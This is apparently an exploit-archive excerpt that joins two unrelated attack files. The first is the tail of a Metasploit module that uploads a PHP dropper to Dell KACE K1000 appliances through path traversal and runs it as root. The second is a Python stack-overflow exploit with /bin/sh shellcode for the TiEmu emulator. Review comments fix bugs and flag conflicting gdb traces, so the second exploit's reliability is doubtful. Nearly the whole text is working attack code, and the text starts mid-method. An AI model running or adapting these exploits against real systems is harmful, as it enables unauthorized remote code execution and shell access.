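    # header may be absent on any other 500 page, so coerce to a string before
    # .downcase (the original raised NoMethodError on nil here).
    appliance = res.headers['X-DellKACE-Appliance'].to_s.downcase
    return Exploit::CheckCode::Safe unless res.code == 500 && appliance == 'k1000'

    version = res.headers['X-DellKACE-Version'].to_s
    match = version.match(/\A([0-9])\.([0-9])\.([0-9]+)\z/)
    return Exploit::CheckCode::Detected unless match

    vprint_status("Found Dell KACE K1000 version #{version}")
    major, minor, build = match.captures.map(&:to_i)
    return Exploit::CheckCode::Safe unless major == 5

    # "prior to" means the listed build is already fixed, so the build
    # comparison is strict; the original used <= and reported the patched
    # 5.4.76849 / 5.5.90547 builds as vulnerable.
    vulnerable =
      minor <= 3 ||                     # 5.0 to 5.3
      (minor == 4 && build < 76849) ||  # 5.4 prior to 5.4.76849
      (minor == 5 && build < 90547)     # 5.5 prior to 5.5.90547

    vulnerable ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  end

  # Drops a PHP file into the web root's tmp/ directory through the
  # unauthenticated kbot_upload.php endpoint, then requests it so the web
  # server executes it. The PHP wrapper hands the command payload to
  # KSudoClient::RunCommandWait (how the module ends up root rather than
  # 'www') and first removes the dropped file so nothing is left on disk.
  #
  # Calls fail_with on connection failure, an unexpected upload response,
  # or when the dropped file cannot be fetched back.
  def exploit
    # Dot-prefixed random name so the dropper is less conspicuous in tmp/.
    fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"
    payload_path = '/kbox/kboxwww/tmp/'
    # Single-quoted PHP string: BadChars keeps 0x27 out of the payload.
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
    print_status("Uploading #{fname} (#{post_data.length} bytes)")

    # machineId is presumably used by the script as a path component; the
    # ../ run walks out of its normal write location into the web-served
    # tmp/ directory. The remaining parameters appear to only need to be
    # present; their order is shuffled so the request has no fixed shape.
    res = send_request_cgi(
      'uri' => normalize_uri('service', 'kbot_upload.php'),
      'method' => 'POST',
      'vars_get' => Hash[{
        'filename' => fname,
        'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",
        'checksum' => 'SCRAMBLE',
        'mac' => rand_text_alphanumeric(rand(8) + 5),
        'kbotId' => rand_text_alphanumeric(rand(8) + 5),
        'version' => rand_text_alphanumeric(rand(8) + 5),
        'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle],
      'data' => post_data)

    fail_with(Failure::Unreachable, 'Connection failed') unless res
    unless res.code == 200
      fail_with(Failure::UnexpectedReply, 'Unable to upload payload')
    end
    print_good('Payload uploaded successfully')

    # Trigger execution by fetching the dropped file from the web root.
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))
    fail_with(Failure::Unreachable, 'Connection failed') unless res

    case res.code
    when 200
      print_good('Payload executed successfully')
    when 404
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
    else
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
    end
  end
end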
            
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
jsacco@exploitpack.com
# Program affected: Texas Instruments calculators emulator (without GDB)
# Version: 3.03-nogdb+dfsg-3
#
# Tested and developed under:  Kali Linux 2.0 x86 - https://www.kali.org
# Program description: TiEmu emulates Texas Instruments calculators TI
9/92/92+/V200PLT.
# Kali Linux 2.0 package: pool/main/t/tiemu/tiemu_3.03-nogdb+dfsg-3_i386.deb
# MD5sum: 79a42bb40dfa8437b6808a9072faf001
# Website: http://lpg.ticalc.org/prj_tiemu/
#
#
# Starting program: /usr/bin/tiemu -rom=$(python -c 'print "A"*80')
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library
"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
# TiEmu 3 - Version 3.03
# THIS PROGRAM COMES WITH ABSOLUTELY NO WARRANTY
# PLEASE READ THE DOCUMENTATION FOR DETAILS
#
# Program received signal SIGSEGV, Segmentation fault.
#
# 0x41414141 in ?? ()
#
# gdb$ backtrace
#0  0xb7fdebe0 in __kernel_vsyscall ()
#1  0xb6ec9367 in __GI_raise (sig=sig@entry=0x6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2  0xb6ecaa23 in __GI_abort () at abort.c:89
#3  0xb6f07778 in __libc_message (do_abort=do_abort@entry=0x2,
fmt=fmt@entry=0xb6ffd715 "*** %s ***: %s
#4  0xb6f97b85 in __GI___fortify_fail (msg=msg@entry=0xb6ffd6fd "stack
smashing detected") at fortify_fail.c:31
#5  0xb6f97b3a in __stack_chk_fail () at stack_chk_fail.c:28
#6  0x0811beb3 in _start ()
#
# NOTE(review): the two gdb excerpts above do not agree. The first reports
# EIP overwritten with 0x41414141; the second shows __stack_chk_fail() aborting
# the process, i.e. a stack canary caught the overflow. With the canary active
# the EIP overwrite used below cannot be reached, so confirm which build
# (with or without -fstack-protector) the exploit was actually developed on.

import errno
import os,subprocess
import sys

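def run():
  """Launch tiemu with an oversized -rom argument to overflow the stack buffer.

  The argument is laid out as JUNK + SHELLCODE + NOPS + EIP, matching the
  original author's layout. The EIP value is a hard-coded stack address from
  the author's Kali 2.0 x86 box and will presumably need adjusting elsewhere.

  Raises OSError (re-raised after a short diagnostic) if the emulator binary
  cannot be executed.

  NOTE: written for Python 2. Under Python 3 these str literals would be
  UTF-8 encoded on the way to execve(), breaking the byte layout; use bytes.
  """
  try:
    print("# Texas Instrument Emulator Buffer Overflow by Juan Sacco")
    print("# This exploit is for educational purposes only")
    # JUNK + SHELLCODE + NOPS + EIP

    junk = "\x41" * 84
    # Linux x86 execve("/bin//sh"): xor eax / push strings / int 0x80.
    # (The original had a line break right after 'shellcode =', which is a
    # SyntaxError as written.)
    shellcode = ("\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
                 "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")
    nops = "\x90" * 12
    eip = "\xd1\xf3\xff\xbf"  # 0xbffff3d1, little-endian
    # The binary is 'tiemu' and it takes the ROM path as one '-rom=<path>'
    # argument (see the gdb command line in the header); the original passed
    # 'tiem ' and '-rom= ' as separate, space-padded strings.
    subprocess.call(["tiemu", "-rom=" + junk + shellcode + nops + eip])

  except OSError as e:
    # errno.ENOENT rather than os.errno: the latter is an accidental alias
    # that later Python versions removed.
    if e.errno == errno.ENOENT:
      print("Sorry, Texas Instrument emulator not found!")
    else:
      print("Error executing exploit")
    raise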

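def howtousage():
  """Print a generic failure message and exit with status -1 (never returns).

  Raises SystemExit via sys.exit. The original never imported sys, so this
  raised NameError instead of exiting; the import is now at file level.
  """
  print("Snap! Something went wrong")
  sys.exit(-1)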

if __name__ == '__main__':
  # Banner only; the try/except around it mirrors the original even though
  # printing a constant cannot raise IndexError.
  banner = [
    "Exploit Tiem 3.03-nogdb+dfsg-3 Local Overflow Exploit",
    "Author: Juan Sacco",
  ]
  try:
    for line in banner:
      print(line)
  except IndexError:
    howtousage()
# NOTE: as in the original this call sits outside the __main__ guard, so the
# exploit also runs when the file is imported as a module.
run()